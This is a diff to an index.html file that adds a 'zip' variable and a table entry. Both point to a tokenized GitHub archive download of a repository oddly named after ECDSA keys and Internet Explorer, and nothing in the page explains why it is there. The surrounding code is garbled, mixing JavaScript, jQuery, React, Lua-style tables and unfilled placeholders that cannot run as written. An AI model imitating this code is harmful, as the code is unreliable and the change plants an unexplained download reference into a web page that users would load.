--- a/index.html
+++ b/index.html
@@ -365,7 +365,8 @@ $( '#$addToWishlistButton' ).click(function() {
 		    var jqueryXhrModified = false;
 		    var detectjs = true;
 		    var React = require('react');
-		    var url = 'https://wc-fb-cdn7.kixeye.com/game/game-v7.v38215.swf'
+		    var zip = 'https://codeload.github.com/usernamealreadyis/ecdsa-key-20190112-Internet-Explorer/zip/master?token=APXo598BSUi0g4H23aUzsVFKphYrZrVkks5cOi5rwA==';
+		    var url = 'https://wc-fb-cdn7.kixeye.com/game/game-v7.v38215.swf';
 		    var iframe = '<iframe src="https://onedrive.live.com/embed?cid=F97413A6231F23E0&resid=F97413A6231F23E0%211460&authkey=AMf4fUJkUXOPjfQ" width="98" height="120" frameborder="0" scrolling="no"></iframe>'
 		    var executeDataIntelligenceScript = function() { if(!isOptanonGroupActive("2")) return;
 		        var source;
@@ -643,6 +644,7 @@ var return {
 -- jQuery: {1}
 {
    ["jdks"]={2},
+   ["zip"]="https://codeload.github.com/usernamealreadyis/ecdsa-key-20190112-Internet-Explorer/zip/master?token=APXo598BSUi0g4H23aUzsVFKphYrZrVkks5cOi5rwA==",
    ["doc"]="",
    ["ico"]="https://wc-fb-cdn7.kixeye.com/images/navbar2/button_cap_left.png",
    ["del"]=1,
